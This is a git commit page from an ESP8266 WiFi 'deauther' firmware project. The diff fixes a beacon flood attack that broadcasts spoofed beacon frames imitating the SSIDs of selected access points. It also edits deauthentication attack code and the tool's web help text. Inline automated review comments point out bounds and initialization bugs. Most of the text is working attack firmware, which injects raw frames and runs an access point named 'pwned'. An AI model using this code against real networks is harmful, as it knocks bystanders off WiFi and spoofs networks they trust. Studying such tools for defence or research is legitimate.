Fixed beacon attack

works now, but unfortunately only in broadcast. A targeted beacon flood attack on a specific client is mostly dropped (maybe because of the SDK?).
Stefan Kremser
2017-02-24 18:24:44 +01:00
parent 725f0eb18c
commit b2907561c3
8 changed files with 40 additions and 25 deletions


@@ -103,7 +103,13 @@ String APScan::getResults(){
void APScan::select(int num){
if(debug) Serial.println("seect "+(String)num+" - "+!selected[num]);
selected[num] = !selected[num];
if(selected[num]){
selected[num] = false;
selectedSum--;
}else{
selected[num] = true;
selectedSum++;
}
}
bool APScan::isSelected(int num){
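Review bot: `selected[num]` is read and written in the new if/else with no range check on `num`, so an index outside the scanned results touches memory outside the array. If `num` can come from a web request (the caller is not visible here), that is an externally controlled out-of-bounds write on the device. A guard at the top of select(), `if(num < 0 || num >= results) return;`, covers it, assuming `results` never exceeds the size of `selected`. The same guard keeps `selectedSum` from counting entries that do not exist.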


@@ -30,6 +30,7 @@ class APScan{
bool isSelected(int num);
int results = 0;
int selectedSum;
MacList aps;
private:
int channels[maxResults];
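Review bot: `int selectedSum;` is added without an initializer while the neighbouring `int results = 0;` has one, so its starting value depends on how the APScan object is created and on code not shown here. The same commit uses it as a divisor in Attack::run (`macListLen/apScan.selectedSum`), where a zero value is an integer division by zero and a stale value silently changes the loop bound. I would write `int selectedSum = 0;` and reset it wherever `selected[]` is cleared for a new scan; that code is outside this page. A check before the division, such as `if(apScan.selectedSum < 1) continue;`, would keep a counter that has drifted from `selected[]` from crashing the loop.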


@@ -50,7 +50,7 @@ void Attack::buildBeacon(Mac _ap, Mac _client, String _ssid, int _ch, bool encry
for(int i=0;i<6;i++){
//set target (client)
packet[4+i] = _client._get(i);
//packet[4+i] = _client._get(i);
//set source (AP)
packet[10+i] = packet[16+i] = _ap._get(i);
}
@@ -83,16 +83,18 @@ void Attack::buildBeacon(Mac _ap, Mac _client, String _ssid, int _ch, bool encry
}
bool Attack::send(){
delay(1); //less packets will be dropped
if(wifi_send_pkt_freedom(packet, packetSize, 0) == -1){
if(debug){
/*if(debug){
Serial.print(packetSize);
Serial.print(" : ");
PrintHex8(packet, packetSize);
Serial.println("");
}
}*/
return false;
}else return true;
}else{
delay(1); //less packets are beeing dropped
return true;
}
}
void Attack::run(){
@@ -143,9 +145,12 @@ void Attack::run(){
if(debug) Serial.println(" done ");
}
/* =============== Beacon Attack =============== */
if(isRunning[1] && currentMillis-prevTime[1] >= 100){
if(debug) Serial.print("running "+(String)attackNames[1]+" attack");
//int a = apScan.getFirstTarget();
for(int a=0;a<apScan.results;a++){
if(apScan.isSelected(a)){
String _ssid = apScan.getAPName(a);
@@ -158,23 +163,27 @@ void Attack::run(){
wifi_set_channel(_ch);
int _selectedClients = 0;
//int _selectedClients = 0;
for(int c=0;c<macListLen;c++){
for(int c=0;c<macListLen/apScan.selectedSum;c++){
String _apName = _ssid;
if(c < _restSSIDLen) for(int d=0; d < _restSSIDLen-c; d++) _apName += " ";//e.g. "SAMPLEAP "
else if(c < _restSSIDLen*2){
_apName = "."+_apName;
for(int d=0;d<(_restSSIDLen-1)-c/2;d++) _apName += " ";//e.g. ".SAMPLEAP "
_apName = " "+_apName;
for(int d=0;d<(_restSSIDLen-1)-c/2;d++) _apName += " ";//e.g. " SAMPLEAP "
}else if(c < _restSSIDLen*3){
_apName += ".";
for(int d=0;d<(_restSSIDLen-1)-c/3;d++) _apName += " ";//e.g. ".SAMPLEAP "
} else{
for(int d=0; d < _restSSIDLen-2; d++) _apName += " ";
for(int d=0; d < _restSSIDLen-1; d++) _apName += " ";
_apName += (String)c;//e.g. "SAMPLEAP 78"
}
//build a broadcast packet for this AP & SSID
buildBeacon(beaconAdrs._get(c),_broadcast,_apName,_ch,apScan.getAPEncryption(a) != "none");
/*
for(int b=0;b<clientScan.results;b++){
if(clientScan.getClientSelected(b)){
_selectedClients++;
@@ -184,16 +193,15 @@ void Attack::run(){
if(send()) packetsCounter[1]++;
}
}
}*/
//if no clients are selected send the broadcast packet
if(_selectedClients == 0) if(send()) packetsCounter[1]++;
/*if(_selectedClients == 0)*/ if(send()) packetsCounter[1]++;
}
}
}
prevTime[1] = millis();
stati[1] = (String)(packetsCounter[1]*10)+"pkts/s";
packetsCounter[1] = 0;
macListChangeCounter++;
@@ -202,6 +210,7 @@ void Attack::run(){
macListChangeCounter = 0;
}
if(debug) Serial.println(" done ");
prevTime[1] = millis();
}
if(isRunning[2] && currentMillis-prevTime[2] >= 1000){
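Review bot: Code is disabled here by commenting it out rather than deleting it, which leaves comments describing behaviour that no longer exists. In buildBeacon `//set target (client)` now sits above a commented-out assignment, and in Attack::run `//if no clients are selected send the broadcast packet` precedes a send that is unconditional. After this change the `_client` argument of buildBeacon appears to be unused for the address bytes, and where those bytes are set instead is not visible in the hunk. I would delete the dead blocks (the `/*if(debug){ … }*/` in send() and the client loop in run()) and reword the two comments to match, e.g. `//always send the broadcast packet`. Both functions extend beyond the hunks shown.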


@@ -14,7 +14,6 @@ extern "C" {
#define attacksNum 2
#define macListLen 80
#define macListInterval 5
extern void PrintHex8(uint8_t *data, uint8_t length);
extern void getRandomVendorMac(uint8_t *buf);
@@ -48,6 +47,7 @@ class Attack
unsigned int packetsCounter[attacksNum];
bool isRunning[attacksNum];
int packetRate = 10;
int macListInterval = 4;
MacList beaconAdrs;

File diff suppressed because one or more lines are too long


@@ -16,7 +16,7 @@ extern "C" {
const static char *ssid = "pwned";
const static char *password = "deauther"; //must have at least 8 characters
const bool debug = true;
const bool debug = false;
ESP8266WebServer server(80);
@@ -134,7 +134,7 @@ void startClientScan(){
if(server.hasArg("time") && apScan.getFirstTarget() > -1 && !clientScan.sniffing) {
server.send(200, "text/json", "true");
clientScan.start(server.arg("time").toInt());
attack.stop(0);
attack.stopAll();
} else server.send ( 200, "text/json", "Error: no selected access point");
}
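Review bot: `server.arg("time").toInt()` is passed to clientScan.start() without a range check; only the presence of the argument is tested. Arduino's `String::toInt()` returns 0 for non-numeric text and passes negative numbers through, so a malformed request starts a scan with a duration the code presumably never expected. Parsing into a local and rejecting values outside a fixed range before calling start() would close that, e.g. `int t = server.arg("time").toInt();` followed by `if(t < 1 || t > MAX_SCAN_SECONDS)` sending the error reply, where `MAX_SCAN_SECONDS` is a placeholder name. The error branch also answers with status 200 and type "text/json" for a plain-text message. The function's opening line appears only in the hunk header.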


@@ -39,13 +39,12 @@
<br>
<b>deauth [deauthentication attack]:</b><br>
Sends deauthentication frames and dissociation frames to the selected client(s) in the selected WiFi access point(s).
<br>
<b>Note: </b>
If no client is selected, the packets are sent as broadcast!
<br><br>
<b>beacon [beacon flood attack]:</b><br>
Sends beacon frames to the selected client(s) with the same SSID as the selected WiFi access point(s).
<br><br>
<b>Note:</b><br>
If no client is selected, the packets are sent as broadcast!
<br>
Spams beacon frames with a similar SSID as the selected WiFi access point(s).
</p>
</div>


@@ -1,4 +1,4 @@
function getResponse(adr, callback, timeoutCallback = function(){alert("timeout error. Please reload the site");}, timeout = 3000){
function getResponse(adr, callback, timeoutCallback = function(){alert("timeout error. Please reload the site");}, timeout = 5000){
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function() {
if(xmlhttp.readyState == 4){